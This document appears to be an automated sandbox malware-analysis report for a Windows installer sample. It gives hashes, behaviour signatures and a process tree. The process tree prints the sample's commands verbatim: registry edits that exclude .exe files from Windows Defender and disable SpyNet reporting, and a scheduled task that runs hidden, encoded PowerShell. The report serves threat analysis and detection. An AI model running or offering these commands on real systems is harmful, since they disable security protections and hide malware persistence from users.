Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
max time network
15s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
29/10/2023, 22:01
Static task
static1
Behavioral task
behavioral1
Sample
b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
Resource
win10v2004-20231020-en
General
-
Target
b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
-
Size
7.3MB
-
MD5
aa1ea1ddc7e58eb23593b1a9a2bf1293
-
SHA1
cfea2b88f2abc426ef066550817b1729295898f0
-
SHA256
b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7
-
SHA512
4a7ff88bded2cf2a095b6903c345076269f691ed82f4c8abd68c9c13159d22837f270c1dfb681af81e01750dc9f6083920595ef8a80de93d38b11d2a519b27fd
-
SSDEEP
196608:91Ow47moHXAOm3vNPANBLr/8m2iXLcqsLfK3j:3ObmoHX5mNorr/Vuaz
Malware Config
Signatures
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 2 IoCs
pid Process 1672 Install.exe 1956 Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1684 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4476 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4476 powershell.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 3280 wrote to memory of 1672 3280 b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe 88 PID 3280 wrote to memory of 1672 3280 b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe 88 PID 3280 wrote to memory of 1672 3280 b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe 88 PID 1672 wrote to memory of 1956 1672 Install.exe 90 PID 1672 wrote to memory of 1956 1672 Install.exe 90 PID 1672 wrote to memory of 1956 1672 Install.exe 90 PID 1956 wrote to memory of 2684 1956 Install.exe 96 PID 1956 wrote to memory of 2684 1956 Install.exe 96 PID 1956 wrote to memory of 2684 1956 Install.exe 96 PID 1956 wrote to memory of 3924 1956 Install.exe 98 PID 1956 wrote to memory of 3924 1956 Install.exe 98 PID 1956 wrote to memory of 3924 1956 Install.exe 98 PID 2684 wrote to memory of 1168 2684 forfiles.exe 100 PID 2684 wrote to memory of 1168 2684 forfiles.exe 100 PID 2684 wrote to memory of 1168 2684 forfiles.exe 100 PID 3924 wrote to memory of 2864 3924 forfiles.exe 101 PID 3924 wrote to memory of 2864 3924 forfiles.exe 101 PID 3924 wrote to memory of 2864 3924 forfiles.exe 101 PID 1168 wrote to memory of 4212 1168 cmd.exe 102 PID 1168 wrote to memory of 4212 1168 cmd.exe 102 PID 1168 wrote to memory of 4212 1168 cmd.exe 102 PID 2864 wrote to memory of 704 2864 cmd.exe 103 PID 2864 wrote to memory of 704 2864 cmd.exe 103 PID 2864 wrote to memory of 704 2864 cmd.exe 103 PID 1168 wrote to memory of 3736 1168 cmd.exe 104 PID 1168 wrote to memory of 3736 1168 cmd.exe 104 PID 1168 wrote to memory of 3736 1168 cmd.exe 104 PID 2864 wrote to memory of 4988 2864 cmd.exe 105 PID 2864 wrote to memory of 4988 2864 cmd.exe 105 PID 2864 wrote to memory of 4988 2864 cmd.exe 105 PID 1956 wrote to memory of 1684 1956 Install.exe 107 PID 1956 wrote to memory of 1684 1956 Install.exe 107 PID 1956 wrote to memory of 1684 1956 Install.exe 107 PID 1956 wrote to memory of 3196 1956 Install.exe 110 PID 1956 wrote to memory of 3196 1956 Install.exe 110 PID 1956 wrote to memory of 3196 1956 Install.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe"C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\7zS89F0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zS8ED2.tmp\Install.exe.\Install.exe /HdidY "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4212
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3736
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:704
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4988
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRDqhgJub" /SC once /ST 18:38:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRDqhgJub"4⤵PID:3196
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD57a828b58479734ae420fecc12a00b474
SHA188d685d7de97ab4c1ef5c2524ab15d3a03c9eb36
SHA25602080ebd09414905472e0f8c52c8b964bc578e72057ead60fdd44fa955e2ff4b
SHA512c8a116cd359c8f5ba7dbe8341e34f217b7ce2079a34eeecb51c5352a9a0af6598ff55bf39c41b48d82909f0410baa4de9b84e848d11f0dd4dedb1f9ad48a3df5
-
Filesize
6.1MB
MD57a828b58479734ae420fecc12a00b474
SHA188d685d7de97ab4c1ef5c2524ab15d3a03c9eb36
SHA25602080ebd09414905472e0f8c52c8b964bc578e72057ead60fdd44fa955e2ff4b
SHA512c8a116cd359c8f5ba7dbe8341e34f217b7ce2079a34eeecb51c5352a9a0af6598ff55bf39c41b48d82909f0410baa4de9b84e848d11f0dd4dedb1f9ad48a3df5
-
Filesize
6.8MB
MD55ea24b94d60ba9cc83b4832930d4a193
SHA1669e5df0dfae166acb9b6714b845ebf5b52b8a44
SHA2566feb6821d956a8d128d74d814d833900b5b9d41b3fa001d3b47556ab8119b236
SHA51261b8bd7ffca87241e55bfbbea5471a53355b332339c6a62593fb6c0632e42e61d1fce4c6294e08c5ac69e31b8a2f7e01d1bff22097f5b2942c5f948579489516
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82